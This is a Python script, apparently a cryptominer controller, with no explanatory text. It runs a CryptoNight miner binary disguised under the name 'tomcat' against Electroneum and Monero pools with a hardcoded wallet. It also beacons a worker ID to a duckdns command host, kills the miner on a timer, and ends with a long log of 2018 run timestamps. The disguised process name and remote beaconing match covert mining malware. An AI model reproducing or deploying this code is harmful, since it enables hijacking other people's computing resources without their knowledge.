import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:05.103579
#2018-02-17 17:35:01.873077
#2018-02-17 19:23:03.864324
#2018-02-17 21:14:06.067308
#2018-02-17 22:58:05.592296
#2018-02-18 00:44:06.406586
#2018-02-18 02:32:03.991526
#2018-02-18 04:19:05.045169
#2018-02-18 06:10:04.001939
#2018-02-18 08:01:02.082237
#2018-02-18 09:49:01.291672
#2018-02-18 11:36:01.609101
#2018-02-18 13:21:07.195978
#2018-02-18 15:11:06.189659
#2018-02-18 16:59:04.626200
#2018-02-18 18:47:06.909256
#2018-02-18 20:34:06.010744
#2018-02-18 22:20:06.907477
#2018-02-19 00:09:05.420463
#2018-02-19 01:55:06.512576
#2018-02-19 03:42:03.008749
#2018-02-19 05:27:05.838455
#2018-02-19 07:14:04.347118
#2018-02-19 09:02:05.768646
#2018-02-19 10:50:08.823844
#2018-02-19 12:39:05.734999
#2018-02-19 14:26:04.893878
#2018-02-19 16:14:07.839557
#2018-02-19 18:01:08.012558
#2018-02-19 19:49:01.683045
#2018-02-19 21:38:07.758885
#2018-02-19 23:24:04.395005
#2018-02-20 01:10:08.541271
#2018-02-20 03:01:06.089933
#2018-02-20 04:49:05.542503
#2018-02-20 06:33:01.977042
#2018-02-20 08:18:01.571935
#2018-02-20 10:03:07.673032
#2018-02-20 11:47:04.352894
#2018-02-20 13:35:09.866535
#2018-02-20 15:20:09.659895
#2018-02-20 17:05:11.674383
#2018-02-20 18:54:08.089713
#2018-02-20 20:45:07.148629
#2018-02-20 22:31:06.832449
#2018-02-21 00:12:08.856198
#2018-02-21 01:58:06.035985
#2018-02-21 03:48:07.800277
#2018-02-21 05:32:01.956211
#2018-02-21 07:21:01.349112
#2018-02-21 09:05:07.631941
#2018-02-21 10:54:01.531948
#2018-02-21 12:42:06.085998
#2018-02-21 14:30:09.325494
#2018-02-21 16:17:07.361025
#2018-02-21 18:06:09.164758
#2018-02-21 19:52:04.580640
#2018-02-21 21:38:07.326816
#2018-02-21 23:25:05.679629
#2018-02-22 01:13:05.741636
#2018-02-22 03:02:01.670721
#2018-02-22 04:46:05.742914
#2018-02-22 06:30:09.845835
#2018-02-22 08:17:07.790593
#2018-02-22 10:06:05.214786
#2018-02-22 11:51:05.235075
#2018-02-22 13:36:05.416916
#2018-02-22 15:25:01.262428
#2018-02-22 17:12:07.979033
#2018-02-22 18:58:07.931628
#2018-02-22 20:50:07.691833
#2018-02-22 22:35:01.336439
#2018-02-23 00:21:07.442564
#2018-02-23 02:10:11.349021
#2018-02-23 03:57:05.758287
#2018-02-23 05:46:07.363428
#2018-02-23 07:29:05.485898
#2018-02-23 09:34:04.390223
#2018-02-23 11:40:07.405028
#2018-02-23 13:31:07.113570
#2018-02-23 15:17:07.603292
#2018-02-23 17:06:01.255906
#2018-02-23 18:37:07.523126
#2018-02-23 20:20:09.367311
#2018-02-23 21:52:07.804914
#2018-02-23 23:32:04.642965
#2018-02-24 01:04:05.501892
#2018-02-24 02:44:04.531741
#2018-02-24 04:23:07.656948
#2018-02-24 05:52:01.601096
#2018-02-24 07:28:07.379529
#2018-02-24 09:02:07.462005
#2018-02-24 10:47:03.942911
#2018-02-24 12:34:05.902862
#2018-02-24 14:23:05.254119
#2018-02-24 16:11:06.204486
#2018-02-24 18:03:04.993718
#2018-02-24 19:50:07.069333
#2018-02-24 21:35:07.481957
#2018-02-25 00:23:04.881153
#2018-02-25 04:18:05.043005
#2018-02-25 07:48:06.963998